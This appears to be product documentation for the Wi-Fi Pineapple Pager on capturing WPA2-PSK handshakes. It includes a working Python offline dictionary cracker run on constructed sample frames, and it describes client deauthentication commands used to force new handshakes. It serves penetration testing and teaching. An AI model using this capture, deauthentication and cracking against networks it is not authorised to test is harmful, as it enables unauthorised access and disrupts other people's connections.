Handshake Collection
Wi-Fi networks using WPA-PSK or WPA2-PSK (the "personal" suites) are vulnerable to an offline dictionary attack against the pre-shared key.
An offline attack means the attacker has already collected all the information needed to test guesses against the network key, and can do so at leisure, with no further traffic to the target network.
Offline attacks are typically performed on a computer with a GPU to accelerate the key derivation, using password lists of hundreds of thousands or millions of candidate passphrases.
WPA Handshakes
Rather than simply using the same encryption key for all clients, when a device joins a WPA-PSK or WPA2-PSK network it performs a special four-message exchange - the 4-way handshake - to derive a temporary per-session key (the pairwise transient key, or PTK) from the pre-shared key, the network name, the two MAC addresses and two random nonces.
The handshake messages carry the nonces in the clear and a message integrity code (MIC) computed with the derived key. By collecting this handshake, it is possible to derive the key from each of thousands (or millions) of candidate passphrases and check it against the captured MIC. When a candidate produces a matching MIC, you now know the original pre-shared key (PSK).
Handshakes are generated when a client connects to a network and when the access point rekeys an existing client session. The rekey interval is an access point setting: this page assumes a default of 300 seconds (5 minutes), but many access points use much longer intervals, so do not count on rekeying to produce a handshake quickly.
Collecting handshakes
Collecting a handshake requires several things:
- A client actively connecting to a WPA-PSK or WPA2-PSK network. Handshakes are only generated when a client is connecting (or being rekeyed).
- The Wi-Fi Pineapple Pager must be on the correct channel at this moment. During normal recon mode the Pager rapidly changes channels to build a view of the Wi-Fi environment, so it may be elsewhere when the handshake happens.
- Critical portions of the handshake must be captured. A handshake consists of 4 specific EAPOL-Key messages; to attack it you need the message carrying the client's nonce and MIC (message 2) together with a message carrying the access point's nonce (message 1 or message 3), plus the network name from a beacon or probe response. A capture that has only message 1, or only message 4, cannot be attacked.
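The following is an added example, not code from the Wi-Fi Pineapple documentation or firmware. It shows concretely what the two paragraphs above describe: how the PSK, SSID, MAC addresses and nonces are turned into the session key, why messages 1 and 2 (or 2 and 3) are the minimum a capture must contain, and how an offline attack tests a wordlist against the MIC. All sample values (SSID, MAC addresses, nonces, the wordlist and the EAPOL frames themselves) are constructed inline for the example; in a real attack they come from the capture file. The MAC addresses would come from the 802.11 headers, which this example does not model.

```python
import hashlib
import hmac

# Constructed sample values; a real capture supplies them from the beacon (SSID),
# the 802.11 headers (MAC addresses) and the EAPOL-Key frames (nonces, MIC).
SSID = b"example-net"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))        # nonce the access point sends in message 1 (and 3)
SNONCE = bytes(range(32, 64))    # nonce the client sends in message 2
WORDLIST = [b"password", b"letmein123", b"correct horse", b"hunter2hunter2"]

NONCE_OFFSET = 17  # EAPOL header (4) + descriptor type (1) + key info (2) + key length (2) + replay counter (8)
MIC_OFFSET = 81    # NONCE_OFFSET + nonce (32) + key IV (16) + key RSC (8) + key ID (8)


def build_eapol_key(key_info: int, nonce: bytes, key_data: bytes) -> bytes:
    """Build an EAPOL-Key frame (802.11i key descriptor layout) with a zeroed MIC field."""
    body = (
        b"\x02"                              # descriptor type: RSN
        + key_info.to_bytes(2, "big")        # Key Information bits (see eapol_key_message)
        + (0).to_bytes(2, "big")             # key length (not needed here)
        + (1).to_bytes(8, "big")             # replay counter
        + nonce
        + bytes(16) + bytes(8) + bytes(8)    # key IV, key RSC, key ID
        + bytes(16)                          # key MIC, zero until computed
        + len(key_data).to_bytes(2, "big")
        + key_data
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL version 2, type 3 = Key


def eapol_key_message(frame: bytes) -> int:
    """Tell which of the four handshake messages a frame is from its Key Information bits."""
    info = int.from_bytes(frame[5:7], "big")
    ack, mic = info & 0x0080, info & 0x0100
    install, secure = info & 0x0040, info & 0x0200
    if ack and not mic:
        return 1                      # AP -> client: ANonce, no MIC yet
    if ack and mic and install:
        return 3                      # AP -> client: ANonce again, MIC, install flag
    if mic and not ack:
        return 4 if secure else 2     # client -> AP: message 2 carries SNonce + MIC
    raise ValueError("not a 4-way handshake message")


def ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce):
    """PRF-512 from IEEE 802.11i: PTK = PRF(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def kck_for(passphrase, ssid, ap_mac, client_mac, anonce, snonce):
    """Passphrase -> PMK (PBKDF2, the expensive step GPUs accelerate) -> PTK -> KCK (first 128 bits)."""
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)
    return ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce)[:16]


def eapol_mic(kck, frame):
    """MIC for key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame with the MIC zeroed, truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def make_sample_handshake(passphrase):
    """Constructed messages 1 and 2 as an AP and a client sharing `passphrase` would send them."""
    m1 = build_eapol_key(0x008a, ANONCE, b"")          # Pairwise | Ack, version 2
    m2 = build_eapol_key(0x010a, SNONCE, b"\x30\x00")  # Pairwise | MIC, version 2; key data stands in for the RSN IE
    kck = kck_for(passphrase, SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    m2 = m2[:MIC_OFFSET] + eapol_mic(kck, m2) + m2[MIC_OFFSET + 16:]
    return [m1, m2]


def crack(frames, ssid, ap_mac, client_mac, wordlist):
    """Offline dictionary attack. Needs message 2 plus message 1 or 3; returns the PSK or None."""
    by_num = {eapol_key_message(f): f for f in frames}
    anonce_frame = by_num.get(1) or by_num.get(3)
    if anonce_frame is None or 2 not in by_num:
        raise ValueError("need message 2 and one of messages 1 or 3")
    anonce = anonce_frame[NONCE_OFFSET:NONCE_OFFSET + 32]
    m2 = by_num[2]
    snonce = m2[NONCE_OFFSET:NONCE_OFFSET + 32]
    captured_mic = m2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = kck_for(candidate, ssid, ap_mac, client_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, m2), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    frames = make_sample_handshake(b"correct horse")
    print(crack(frames, SSID, AP_MAC, CLIENT_MAC, WORDLIST))  # b'correct horse'
```

Everything an attacker needs is in the capture; nothing is sent to the network while guessing, which is what makes the attack offline. The check in crack is also the one to run on your own capture before handing it to a cracker: if message 2 is missing, or neither message 1 nor 3 is present, the file is not crackable no matter how large the wordlist. Real tools additionally verify that the two messages belong to the same handshake by comparing replay counters.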
Handshake capture can sometimes be difficult for all these reasons, and because the handshake messages (EAPOL frames) are transmitted as data frames. While beacon frames (network advertisements) are management frames which are typically sent at the lowest, most robust rates, data frames are subject to automatic rate scaling.
Based on the capabilities of the client and access point, and the signal quality of the connection, data packets can be sent at variable speeds. The higher the capabilities and connection quality, the faster the data rate used for clients.
As the data rate of the packets increases, it becomes more difficult to passively capture a packet. Higher speeds are transmitted with more complex encodings, and on multiple-antenna systems they are transmitted with radio modes (such as MIMO spatial streams) which can make capture very challenging. The Pineapple recon engine is designed to maximize the chances of capturing a handshake, including setting channel configuration to capture the most data encoding types possible, and pausing channel hopping the instant the first packet in a handshake is seen.
It may be necessary to monitor for a long period of time (even up to hours, in a completely passive environment) to capture a full handshake - this is a normal part of how Wi-Fi operates.
Maximizing handshake collection
To maximize handshake collection, the Pager can be locked to a specific channel. This can be done using the DuckyScript commands PINEAPPLE_EXAMINE_CHANNEL, which stops channel hopping and pauses on a single channel, and PINEAPPLE_EXAMINE_BSSID, which automatically finds the channel of a known access point and pauses hopping there.
These commands can be run from an SSH session or the terminal in the Virtual Pager, or activated by user or recon payloads.
When locked to a channel, the Pager has the maximum chance of collecting handshakes, but will not be able to monitor devices or access points on other channels.
Handshake collection can be combined with client deauthentication to increase the chances of capture - whenever a client joins a network it performs a handshake, so by forcing clients to reconnect, new handshakes may be generated. The Pineapple client disconnection feature can be triggered from the command line or a payload using the PINEAPPLE_DEAUTH_CLIENT command. Note that deauthentication is active, not passive: it is visible to the target and to any wireless intrusion detection system, and clients on networks that support Protected Management Frames (802.11w) will ignore it.
Be sure to only trigger client deauthentication against networks that are in the scope of your engagement!
Deauthenticating clients from networks which aren’t yours and which you haven’t been given permission to test isn’t only a jerk move, it may be illegal in some jurisdictions. Know the laws of your region!
Return to normal recon mode with PINEAPPLE_EXAMINE_RESET.
Downloading Handshakes
Captured handshakes are stored in /root/loot/handshakes/. Handshake files are stored in the original pcap format and in the Hashcat hccapx format.
You can download handshakes from your Pager using scp or sftp, or by downloading loot via the Virtual Pager.